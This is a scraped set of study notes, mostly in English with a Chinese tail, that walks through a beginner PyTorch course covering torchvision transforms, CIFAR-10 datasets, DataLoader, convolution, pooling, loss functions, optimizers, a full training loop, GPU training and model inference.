        This transform acts out of place, i.e., it does not mutate the input tensor.

    Args:
        mean (sequence): Sequence of means for each channel.
        std (sequence): Sequence of standard deviations for each channel.
        inplace(bool,optional): Bool to make this operation in-place.

    """
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter
    from torchvision import transforms

    writer = SummaryWriter("logs")
    img = Image.open("images/pytorch.png")
    print(img)

    # ToTensor
    trans_totensor = transforms.ToTensor()
    img_tensor = trans_totensor(img)
    writer.add_image("ToTensor", img_tensor)

    # Normalize
    print(img_tensor[0][0][0])
    trans_norm = transforms.Normalize([6, 3, 2], [9, 3, 5])
    img_norm = trans_norm(img_tensor)
    print(img_norm[0][0][0])
    writer.add_image("Normalize", img_norm, 1)


Common Transforms (2)

Resize changes the image size.

    # Resize
    print(img.size)
    trans_resize = transforms.Resize((512, 512))
    # img PIL -> resize -> img_resize PIL
    img_resize = trans_resize(img)
    # img_resize PIL -> totensor -> img_resize tensor
    img_resize = trans_totensor(img_resize)
    writer.add_image("Resize", img_resize, 0)
    print(img_resize)



Compose: applies the transform operations in the given list one after another.

class Compose:
    """Composes several transforms together. This transform does not support torchscript.
    Please, see the note below.

    Args:
        transforms (list of ``Transform`` objects): list of transforms to compose.

    Example:
        >>> transforms.Compose([
        >>>     transforms.CenterCrop(10),
        >>>     transforms.PILToTensor(),
        >>>     transforms.ConvertImageDtype(torch.float),
        >>> ])

    .. note::
        In order to script the transformations, please use ``torch.nn.Sequential`` as below.

        >>> transforms = torch.nn.Sequential(
        >>>     transforms.CenterCrop(10),
        >>>     transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
        >>> )
        >>> scripted_transforms = torch.jit.script(transforms)

        Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require
        `lambda` functions or ``PIL.Image``.

    """
    # Compose - resize - 2
    trans_resize_2 = transforms.Resize(512)
    # PIL -> PIL -> tensor
    trans_compose = transforms.Compose([trans_resize_2, trans_totensor])
    img_resize_2 = trans_compose(img)
    writer.add_image("Resize", img_resize_2, 1)

Equivalent to first scaling with trans_resize_2 and then converting to a tensor with trans_totensor, as the one-line check below shows.
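
# trans_compose(img) gives the same result as chaining the two transforms by hand:
img_manual = trans_totensor(trans_resize_2(img))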


RandomCrop: random cropping

    # RandomCrop
    trans_random = transforms.RandomCrop([32, 64])
    trans_compose_2 = transforms.Compose([trans_random, trans_totensor])
for i in range(10):
    img_crop = trans_compose_2(img)
    writer.add_image("RandomCropHW", img_crop, i)


Using the datasets in torchvision

Look up the usage of torchvision.datasets on the official site.

Choose the CIFAR10 dataset and read in train_set and test_set:

import torchvision
from torch.utils.tensorboard import SummaryWriter

dataset_transform = torchvision.transforms.Compose([torchvision.transforms.ToTensor()])  # PIL -> tensor

train_set = torchvision.datasets.CIFAR10(root="./dataset", train=True, transform=dataset_transform, download=True)
test_set = torchvision.datasets.CIFAR10(root="./dataset", train=False, transform=dataset_transform, download=True)

With download=True, it checks whether the dataset already exists in root and is intact; if not, it downloads it:

    C:\Users\gzjzx\anaconda3\python.exe D:/Study/1st-year-master/XiaoTuDui/Test/P10_dataset_transform.py
    Downloading https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz to ./dataset\cifar-10-python.tar.gz
    1%| | 1114112/170498071 [00:40<48:11, 58582.60it/s]

You can copy the URL https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz into Thunder (迅雷) and let it do the download instead, which is much faster; then copy the downloaded archive back into the dataset directory.

    Using downloaded and verified file: ./dataset\cifar-10-python.tar.gz
    Extracting ./dataset\cifar-10-python.tar.gz to ./dataset
    Files already downloaded and verified

Following the dataset description on the official page, CIFAR-10 and CIFAR-100 datasets (toronto.edu), inspect the data:

    print(test_set[0])
    print(test_set.classes)

    img, target = test_set[0]
    print(img)
    print(target)
    print(test_set.classes[target])
    # img.show()
    print(test_set[0])

# View the first 10 images of the test set in TensorBoard
writer = SummaryWriter("p10")
for i in range(10):
    img, target = test_set[i]
    writer.add_image("test_set", img, i)

    writer.close()


Using DataLoader


• PyTorch has two classes:
  • Dataset: provides a way to fetch the data and their labels
    • how to fetch each sample and its label
    • how many samples there are in total
  • DataLoader: packages the data into the forms the downstream network consumes

Using DataLoader:

import torchvision

# The test dataset to load
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

test_data = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor())

test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

# First image and its target in the test dataset
img, target = test_data[0]
print(img.shape)
print(target)

writer = SummaryWriter("dataloader")
step = 0
for data in test_loader:
    imgs, targets = data
    # print(imgs.shape)
    # print(targets)
    writer.add_images("test_data", imgs, step)
    step += 1

writer.close()

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

• dataset=test_data: the dataset to read from
• batch_size=4: read 4 images at a time
• shuffle=True: shuffle the image order
• drop_last=False: if the dataset size is not divisible by batch_size, should the last incomplete batch be dropped? No.


The basic skeleton of a neural network: using nn.Module

Check the help documentation:

For the forward pass (input -> forward -> output), design your own network class that inherits from nn.Module; in the initializer, call super(Model, self).__init__().

import torch.nn as nn
import torch.nn.functional as F


class Model(nn.Module):
    def __init__(self):
        super(Model, self).__init__()
        self.conv1 = nn.Conv2d(1, 20, 5)
        self.conv2 = nn.Conv2d(20, 20, 5)

    def forward(self, x):
        x = F.relu(self.conv1(x))
        return F.relu(self.conv2(x))

Design the simplest possible module, whose output is its input plus 1:

import torch
from torch import nn


class MyClass(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, input):
        output = input + 1
        return output


myClass = MyClass()
input = torch.tensor(1.0)
output = myClass(input)  # calling the module invokes forward() via nn.Module.__call__
print(output)
    tensor(2.)

土堆 on the convolution operation (optional)

A rough walkthrough of the convolution operation torch.nn.functional.conv2d and the meaning of stride and padding.

import torch
import torch.nn.functional as F

input = torch.tensor([[1, 2, 0, 3, 1],
                      [0, 1, 2, 3, 1],
                      [1, 2, 1, 0, 0],
                      [5, 2, 3, 1, 1],
                      [2, 1, 0, 1, 1]])

kernel = torch.tensor([[1, 2, 1],
                       [0, 1, 0],
                       [2, 1, 0]])

input = torch.reshape(input, (1, 1, 5, 5))
kernel = torch.reshape(kernel, (1, 1, 3, 3))

print(input.shape)
print(kernel.shape)

output = F.conv2d(input, kernel, stride=1)
print(output)

output2 = F.conv2d(input, kernel, stride=2)
print(output2)

output3 = F.conv2d(input, kernel, stride=1, padding=1)
print(output3)
    torch.Size([1, 1, 5, 5])
    torch.Size([1, 1, 3, 3])
    tensor([[[[10, 12, 12],
    [18, 16, 16],
    [13, 9, 3]]]])
    tensor([[[[10, 12],
    [13, 3]]]])
    tensor([[[[ 1, 3, 4, 10, 8],
    [ 5, 10, 12, 12, 6],
    [ 7, 18, 16, 16, 8],
    [11, 13, 9, 3, 4],
    [14, 13, 9, 7, 4]]]])

Neural networks: convolutional layers

Official docs:

    torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', device=None, dtype=None)

• in_channels (int) – Number of channels in the input image
• out_channels (int) – Number of channels produced by the convolution
• kernel_size (int or tuple) – Size of the convolving kernel
• stride (int or tuple, optional) – Stride of the convolution. Default: 1
• padding (int, tuple or str, optional) – Padding added to all four sides of the input. Default: 0

Less commonly used:

• padding_mode (str, optional) – 'zeros', 'reflect', 'replicate' or 'circular'. Default: 'zeros'
• dilation (int or tuple, optional) – Spacing between kernel elements. Default: 1
• groups (int, optional) – Number of blocked connections from input channels to output channels. Default: 1
• bias (bool, optional) – If True, adds a learnable bias to the output. Default: True


The input/output size formula from the Conv2d docs is $H_{out} = \lfloor (H_{in} + 2 \cdot padding - dilation \cdot (kernel\_size - 1) - 1) / stride + 1 \rfloor$ (and likewise for the width). If a paper does not spell out its conv parameters, this formula lets you infer them.
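
As a quick sanity check against the conv layer used below (32x32 input, kernel_size=3, stride=1, padding=0):

# Sanity check of the Conv2d output-size formula.
H_in, padding, dilation, kernel_size, stride = 32, 0, 1, 3, 1
H_out = (H_in + 2 * padding - dilation * (kernel_size - 1) - 1) // stride + 1
print(H_out)  # 30, matching the [64, 6, 30, 30] output shape below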


Import the relevant libraries:

import torch
import torchvision
from torch import nn
from torch.nn import Conv2d
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

dataset = torchvision.datasets.CIFAR10("./dataset",
                                       train=False,
                                       transform=torchvision.transforms.ToTensor(),
                                       download=True)
dataloader = DataLoader(dataset, batch_size=64)

Design the CNN structure:

class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.conv1 = Conv2d(in_channels=3, out_channels=6, kernel_size=3, stride=1, padding=0)

    def forward(self, x):
        x = self.conv1(x)
        return x


myClass = MyClass()
print(myClass)

Run it and write the results to TensorBoard:

    writer = SummaryWriter("./logs")
    step = 0
    for data in dataloader:
    imgs, targets = data
    output = myClass(imgs)
    print(imgs.shape)
    print(output.shape)
    # torch.Size([64, 3, 32, 32])
    writer.add_images("input", imgs, step)
    # torch.Size([64, 6, 30, 30]) -> [xxx, 3, 30, 30]
    output = torch.reshape(output, (-1, 3, 30, 30))
    writer.add_images("output", output, step)
    step += 1


Neural networks: using max pooling

Max pooling is a form of downsampling.

Official docs:

    torch.nn.MaxPool2d(kernel_size, stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)

• kernel_size (Union[int, Tuple[int, int]]) – the size of the window to take a max over
• stride (Union[int, Tuple[int, int]]) – the stride of the window. Default value is kernel_size
• padding (Union[int, Tuple[int, int]]) – implicit negative infinity padding to be added on both sides
• dilation (Union[int, Tuple[int, int]]) – a parameter that controls the stride of elements in the window
• return_indices (bool) – if True, will return the max indices along with the outputs. Useful for torch.nn.MaxUnpool2d later
• ceil_mode (bool) – when True, will use ceil (round up) instead of floor (round down) to compute the output shape

import torch
import torchvision
from torch import nn
from torch.nn import MaxPool2d
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

dataset = torchvision.datasets.CIFAR10("./dataset",
                                       train=False,
                                       transform=torchvision.transforms.ToTensor(),
                                       download=True)
dataloader = DataLoader(dataset, batch_size=64)

input = torch.tensor([[1, 2, 0, 3, 1],
                      [0, 1, 2, 3, 1],
                      [1, 2, 1, 0, 0],
                      [5, 2, 3, 1, 1],
                      [2, 1, 0, 1, 1]], dtype=torch.float32)
input = torch.reshape(input, (-1, 1, 5, 5))  # reshape returns a new tensor, so assign it back
print(input.shape)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.maxpool1 = MaxPool2d(kernel_size=3, ceil_mode=False)

    def forward(self, input):
        output = self.maxpool1(input)
        return output


myClass = MyClass()

writer = SummaryWriter("./logs_maxpool")
step = 0

for data in dataloader:
    imgs, targets = data
    writer.add_images("input", imgs, step)
    output = myClass(imgs)
    writer.add_images("output", output, step)
    step += 1

writer.close()
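
ceil_mode decides what happens when the window does not fit evenly: with a 5x5 input and kernel_size=3 (stride defaults to kernel_size), floor gives a 1x1 output while ceil gives 2x2. A minimal check:

import torch
from torch.nn import MaxPool2d

x = torch.arange(25, dtype=torch.float32).reshape(1, 1, 5, 5)
print(MaxPool2d(kernel_size=3, ceil_mode=False)(x).shape)  # torch.Size([1, 1, 1, 1])
print(MaxPool2d(kernel_size=3, ceil_mode=True)(x).shape)   # torch.Size([1, 1, 2, 2])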


Neural networks: non-linear activations

Official docs:

import torch
import torchvision
from torch import nn
from torch.nn import ReLU
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

input = torch.tensor([[1, -0.5],
                      [-1, 3]])

input = torch.reshape(input, (-1, 1, 2, 2))  # reshape into the (N, C, H, W) form the layers expect
print(input.shape)

dataset = torchvision.datasets.CIFAR10("./dataset", train=False, download=True,
                                       transform=torchvision.transforms.ToTensor())

dataloader = DataLoader(dataset, batch_size=64)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.relu1 = ReLU()

    def forward(self, input):
        output = self.relu1(input)
        return output


myclass = MyClass()

writer = SummaryWriter("./logs_relu")
step = 0
for data in dataloader:
    imgs, targets = data
    writer.add_images("inputs", imgs, global_step=step)
    output = myclass(imgs)
    writer.add_images("output", output, step)
    step += 1

writer.close()


Neural networks: linear layers and others

import torch
import torchvision
from torch import nn
from torch.nn import Linear
from torch.utils.data import DataLoader

dataset = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor(),
                                       download=True)

dataloader = DataLoader(dataset, batch_size=64)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.linear1 = Linear(196608, 10)  # 196608 = 64 * 3 * 32 * 32, one flattened batch

    def forward(self, input):
        output = self.linear1(input)
        return output


myclass = MyClass()

for data in dataloader:
    imgs, targets = data
    print(imgs.shape)
    output = torch.flatten(imgs)
    # output = torch.reshape(imgs, (1, 1, 1, -1))
    print(output.shape)
    output = myclass(output)
    print(output.shape)

See torch.nn — PyTorch 2.0 documentation for more network building blocks.

Classic network models are also available from Search — Torchvision 0.15 documentation (pytorch.org) and Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org).

Neural networks: a small hands-on build and using Sequential

Use Sequential() to combine several layers into a single module.

Build the following network:

(figure: the CIFAR-10 model structure that the code below implements)

import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model1 = Sequential(
            Conv2d(3, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 64, 5, padding=2),
            MaxPool2d(2),
            Flatten(),
            Linear(1024, 64),
            Linear(64, 10)
        )

    def forward(self, x):
        x = self.model1(x)
        return x


myClass = MyClass()
print(myClass)
input = torch.ones((64, 3, 32, 32))
output = myClass(input)
print(output.shape)

writer = SummaryWriter('../logs_seq')
writer.add_graph(myClass, input)
writer.close()

writer.add_graph() renders the full architecture in TensorBoard.
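
The 1024 in Linear(1024, 64) is not arbitrary: each MaxPool2d(2) halves the 32x32 spatial size, so after three poolings the feature map is 64 channels of 4x4, and Flatten() produces 64 * 4 * 4 = 1024 values. A quick check:

# Where Linear(1024, 64) gets its input size.
channels, side = 64, 32
for _ in range(3):   # three MaxPool2d(2) layers
    side //= 2
print(channels * side * side)  # 1024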


Loss functions and backpropagation

PyTorch ships with many built-in loss functions; see Search — PyTorch 2.0 documentation.

L1Loss(), MSELoss(), CrossEntropyLoss()

    import torch
    from torch import nn
    from torch.nn import L1Loss, MSELoss

    inputs = torch.tensor([1, 2, 3], dtype=torch.float32)
    targets = torch.tensor([1, 2, 5], dtype=torch.float32)

    inputs = torch.reshape(inputs, (1, 1, 1, 3))
    targets = torch.reshape(targets, (1, 1, 1, 3))

    loss = L1Loss()
    result = loss(inputs, targets)

    loss_mse = MSELoss()
    result_mse = loss_mse(inputs, targets)

    print(result, result_mse)

    x = torch.tensor([0.1, 0.2, 0.3])
    y = torch.tensor([1])
    x = torch.reshape(x, (1, 3))
    loss_cross = nn.CrossEntropyLoss()
    result_cross = loss_cross(x, y)
    print(result_cross)
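
The printed values are easy to verify by hand: L1 averages the absolute errors, MSE the squared errors, and cross entropy is -x[class] + log(sum(exp(x))):

# Hand-check of the three results printed above.
import math

print((0 + 0 + 2) / 3)   # L1Loss  -> 0.6667
print((0 + 0 + 4) / 3)   # MSELoss -> 1.3333
x = [0.1, 0.2, 0.3]
print(-x[1] + math.log(sum(math.exp(v) for v in x)))  # CrossEntropyLoss -> 1.1019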

Backpropagating the loss produces the gradient of every parameter in the model: result_loss.backward()

import torch
import torchvision
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter

dataset = torchvision.datasets.CIFAR10("../dataset", train=False, transform=torchvision.transforms.ToTensor(),
                                       download=True)

dataloader = DataLoader(dataset, batch_size=1)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model1 = Sequential(
            Conv2d(3, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 32, 5, padding=2),
            MaxPool2d(2),
            Conv2d(32, 64, 5, padding=2),
            MaxPool2d(2),
            Flatten(),
            Linear(1024, 64),
            Linear(64, 10)
        )

    def forward(self, x):
        x = self.model1(x)
        return x


loss = nn.CrossEntropyLoss()
myClass = MyClass()
for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    print(outputs)
    print(targets)
    result_loss = loss(outputs, targets)
    print(result_loss)
    result_loss.backward()

Optimizers

Official docs:

loss = nn.CrossEntropyLoss()
myClass = MyClass()
optim = torch.optim.SGD(myClass.parameters(), lr=0.01)
for epoch in range(20):
    running_loss = 0.0
    for data in dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        result_loss = loss(outputs, targets)
        optim.zero_grad()
        result_loss.backward()
        optim.step()
        running_loss = running_loss + result_loss
    print(running_loss)

Take plain stochastic gradient descent as the example: optim = torch.optim.SGD(myClass.parameters(), lr=0.01) takes the model's parameters and then the learning rate.

• Nest the training loop inside for epoch in range(20): to run several rounds of optimization.

• Zero the gradients before every descent step: optim.zero_grad()

• Compute the new gradients: result_loss.backward()

• Update the model parameters: optim.step()

Generally, each epoch should drive the loss value down.

Using and modifying existing network models

Popular models, with and without pretrained weights, are available from Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org).

• Initialize a VGG-16 model with untrained parameters: vgg16_false = torchvision.models.vgg16(pretrained=False)

• Initialize a VGG-16 model and download its pretrained parameters: vgg16_true = torchvision.models.vgg16(pretrained=True)

• Append a layer to an existing model: vgg16_true.add_module('add_linear', nn.Linear(1000, 10))

• Replace a layer in an existing model: vgg16_false.classifier[6] = nn.Linear(4096, 10)
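
Note that torchvision 0.13+ deprecates the pretrained flag in favor of a weights argument; a rough equivalent of the calls above, using the enum name from the torchvision docs:

import torchvision
from torch import nn
from torchvision.models import VGG16_Weights

vgg16_true = torchvision.models.vgg16(weights=VGG16_Weights.IMAGENET1K_V1)  # pretrained weights
vgg16_false = torchvision.models.vgg16(weights=None)                        # random init
vgg16_true.add_module('add_linear', nn.Linear(1000, 10))   # append a layer
vgg16_false.classifier[6] = nn.Linear(4096, 10)            # replace a layer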

A complete model-training workflow (1)

Create a separate model.py file to define the model:

# Build the neural network
import torch
from torch import nn


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model = nn.Sequential(
            nn.Conv2d(3, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Flatten(),
            nn.Linear(1024, 64),
            nn.Linear(64, 10)
        )

    def forward(self, x):
        x = self.model(x)
        return x


if __name__ == '__main__':
    myClass = MyClass()
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

In train.py, set up the loss function, optimizer, number of training epochs, and so on, and train the network:

from model import *
import torchvision

# Prepare the datasets
from torch import nn
from torch.utils.data import DataLoader

train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
                                          download=True)
test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
                                         download=True)
# Dataset lengths
train_data_size = len(train_data)
test_data_size = len(test_data)
print('Training set size: {}'.format(train_data_size))
print('Test set size: {}'.format(test_data_size))

# Load the datasets with DataLoader
train_dataloader = DataLoader(train_data, batch_size=64)
test_dataloader = DataLoader(test_data, batch_size=64)

# Create the network model
myClass = MyClass()

# Loss function
loss_fn = nn.CrossEntropyLoss()

# Define the optimizer
learning_rate = 1e-2
optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

# Training bookkeeping
total_train_step = 0  # number of training steps so far
total_test_step = 0   # number of test passes so far
epoch = 10            # number of epochs

# Training
for i in range(epoch):
    print('Epoch {} starting'.format(i + 1))
    # Training steps
    for data in train_dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        loss = loss_fn(outputs, targets)

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        total_train_step = total_train_step + 1
        print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))

A complete model-training workflow (2) and (3)

from torch.utils.tensorboard import SummaryWriter
from model import *
import torchvision

# Prepare the datasets
from torch import nn
from torch.utils.data import DataLoader

train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
                                          download=True)
test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
                                         download=True)
# Dataset lengths
train_data_size = len(train_data)
test_data_size = len(test_data)
print('Training set size: {}'.format(train_data_size))
print('Test set size: {}'.format(test_data_size))

# Load the datasets with DataLoader
train_dataloader = DataLoader(train_data, batch_size=64)
test_dataloader = DataLoader(test_data, batch_size=64)

# Create the network model
myClass = MyClass()

# Loss function
loss_fn = nn.CrossEntropyLoss()

# Define the optimizer
learning_rate = 1e-2
optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

# Training bookkeeping
total_train_step = 0  # number of training steps so far
total_test_step = 0   # number of test passes so far
epoch = 10            # number of epochs

# Add TensorBoard
writer = SummaryWriter('../logs_train')

# Training
for i in range(epoch):
    print('Epoch {} starting'.format(i + 1))
    # Training steps
    myClass.train()
    for data in train_dataloader:
        imgs, targets = data
        outputs = myClass(imgs)
        loss = loss_fn(outputs, targets)

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        total_train_step = total_train_step + 1
        if total_train_step % 100 == 0:
            print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))
            writer.add_scalar('train_loss', loss.item(), total_train_step)

    # Test steps
    myClass.eval()
    total_test_loss = 0
    total_accuracy = 0
    with torch.no_grad():
        for data in test_dataloader:
            imgs, targets = data
            outputs = myClass(imgs)
            loss = loss_fn(outputs, targets)

            total_test_loss = total_test_loss + loss

            accuracy = (outputs.argmax(1) == targets).sum()
            total_accuracy += accuracy
    print('Loss on the whole test set: {}'.format(total_test_loss))
    print('Accuracy on the whole test set: {}'.format(total_accuracy / test_data_size))
    writer.add_scalar('test_loss', total_test_loss, total_test_step)
    writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)
    total_test_step += 1

    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))
    print("Model saved")

writer.close()

Switch the model between train/eval modes with myClass.train() and myClass.eval(); this matters for layers such as Dropout and BatchNorm.

Run the test steps under with torch.no_grad(): (no parameter updates and no gradient bookkeeping, which saves memory).

Print the loss value periodically during training:

if total_train_step % 100 == 0:
    print('Step: {}, Loss: {}'.format(total_train_step, loss.item()))

Compute the accuracy:

    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy
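
outputs.argmax(1) picks the index of the largest logit in each row, so comparing it with targets and summing counts the correct predictions in the batch; a tiny check:

import torch

outputs = torch.tensor([[0.1, 0.9],    # predicts class 1
                        [0.8, 0.2]])   # predicts class 0
targets = torch.tensor([1, 0])
print((outputs.argmax(1) == targets).sum())  # tensor(2): both correct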

Use SummaryWriter to visualize the training process:

    • writer.add_scalar('train_loss', loss.item(), total_train_step)
    • writer.add_scalar('test_loss', total_test_loss, total_test_step)
    • writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)


Save the model after each epoch:

torch.save(myClass, "myClass_{}.pth".format(i))
# torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))  # the state_dict variant
print("Model saved")

Training on the GPU (1)

The network model can use CUDA:

myClass = MyClass()
if torch.cuda.is_available():
    myClass = myClass.cuda()  # move the network model onto the GPU

The loss function can use CUDA:

# Loss function
loss_fn = nn.CrossEntropyLoss()
if torch.cuda.is_available():
    loss_fn = loss_fn.cuda()

The optimizer cannot; it has no .cuda() method and simply works on whatever device the parameters live on.

The training and test data can use CUDA too:

for data in train_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
        imgs = imgs.cuda()
        targets = targets.cuda()

for data in test_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
        imgs = imgs.cuda()
        targets = targets.cuda()


Training on the GPU (2)

Use torch.device() to set the training device: device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

With multiple GPUs, 'cuda:0' selects GPU 0, and so on.

Move everything onto that device for training:

• myClass = myClass.to(device) for the model

• loss_fn = loss_fn.to(device) for the loss function

• inside each dataloader loop: imgs = imgs.to(device) and targets = targets.to(device)

A complete model validation workflow

Take an already-trained model, feed it an input, and get the prediction you want.

import torch
import torchvision
from PIL import Image
from torch import nn

image_path = '../imgs/dog.png'
image = Image.open(image_path)
image = image.convert('RGB')

transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
                                            torchvision.transforms.ToTensor()])
image = transform(image)
print(image.shape)


class MyClass(nn.Module):
    def __init__(self):
        super(MyClass, self).__init__()
        self.model = nn.Sequential(
            nn.Conv2d(3, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 32, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 5, padding=2),
            nn.MaxPool2d(2),
            nn.Flatten(),
            nn.Linear(1024, 64),
            nn.Linear(64, 10)
        )

    def forward(self, x):
        x = self.model(x)
        return x


model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
print(model)

image = torch.reshape(image, (1, 3, 32, 32))
model.eval()
with torch.no_grad():
    output = model(image)
print(output)
print(output.argmax(1))

Read in the test image:

    image_path = '../imgs/dog.png'
    image = Image.open(image_path)
    image = image.convert('RGB')

transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
                                            torchvision.transforms.ToTensor()])
    image = transform(image)
    print(image.shape)

Load the trained model; map_location=torch.device('cpu') lets a model trained on CUDA be tested on a CPU-only machine (otherwise loading raises an error):

    model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
    print(model)

Produce the prediction:

image = torch.reshape(image, (1, 3, 32, 32))
model.eval()
with torch.no_grad():
    output = model(image)
print(output)
print(output.argmax(1))
    tensor([[-2.7974, -0.1087,  0.5627,  1.2185,  1.4736,  1.4348,  2.3175,  1.3776,
    -3.5540, -0.6126]])
    tensor([6])
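
The predicted index can be mapped back to a class name via the dataset's class list (CIFAR-10's standard order is used here):

# Map the predicted index back to a CIFAR-10 class name.
classes = ['airplane', 'automobile', 'bird', 'cat', 'deer',
           'dog', 'frog', 'horse', 'ship', 'truck']
print(classes[6])  # 'frog': this epoch-0 checkpoint misclassifies the dog image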

A look at open-source projects

Read the README.md; train.py is usually the entry point for training.

Training scripts usually take command-line arguments; see 【Python】Parser 通常用法 - 知乎 (zhihu.com).

    ]]>
    + 视频

    课程

    Python 学习中的两大法宝函数(当然也可以用在 PyTorch)

    1
    from torch.utils.data import Dataset
    1
    help(Dataset)
    1
    Dataset??

    PyTorch 加载数据初认识

    Pytorch 有两个类:

    • Dataset: 提供一种方式去获取数据及其标签
      • 如何获取每一个数据及其标签
      • 告诉我们总共有多少数据
    • Dataloader: 为后面的网络提供不同的数据形式

    Dataset 类代码实战

    png

    ​ 下载了数据包,是一个蚂蚁和蜜蜂的二分类问题。训练集根目录为 dataset/train,标签有 antsbees

    ​ 设计一个类 MyData,负责读取数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    from torch.utils.data import Dataset
    from PIL import Image
    import os

    class MyData(Dataset):

    def __init__(self, root_dir, label_dir):
    """
    初始化
    :param root_dir: 根目录
    :param label_dir: 标签目录
    """
    self.root_dir = root_dir
    self.label_dir = label_dir
    self.path = os.path.join(self.root_dir, self.label_dir)
    self.img_path = os.listdir(self.path)

    def __getitem__(self, idx):
    """
    获取对象
    :param idx: 索引
    :return:
    """
    img_name = self.img_path[idx]
    img_item_path = os.path.join(self.root_dir, self.label_dir, img_name)
    img = Image.open(img_item_path)
    label = self.label_dir
    return img, label

    def __len__(self):
    return len(self.img_path)


    root_dir = "dataset/train"
    ants_label_dir = "ants"
    bees_label_dir = "bees"
    ants_dataset = MyData(root_dir, ants_label_dir)
    bees_dataset = MyData(root_dir, bees_label_dir)

    TensorBoard 的使用(一)

    使用 pytorch 的 tensorboard 在网页端显示函数图像 $y=2x$:

    1
    2
    3
    4
    5
    6
    7
    8
    from torch.utils.tensorboard import SummaryWriter

    writer = SummaryWriter("logs")

    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    在 shell 端口中 tensorboard --logdir=logs:(启动 tensorboard,logdir 目录为 logs

    1
    2
    3
    PS D:\Study\1st-year-master\XiaoTuDui\Test> tensorboard --logdir=logs
    Serving TensorBoard on localhost; to expose to the network, use a proxy or pass --bind_all
    TensorBoard 2.9.1 at http://localhost:6006/ (Press CTRL+C to quit)

    png

    如果两段 writer.add_scalar 名称相同,可能会出现一张图像混合形成两张图像的情况,可以考虑清除项目中 logs/ 的缓存刷新。

    TensorBoard 的使用(二)

    主要讲了 writer.add_image 的用法。

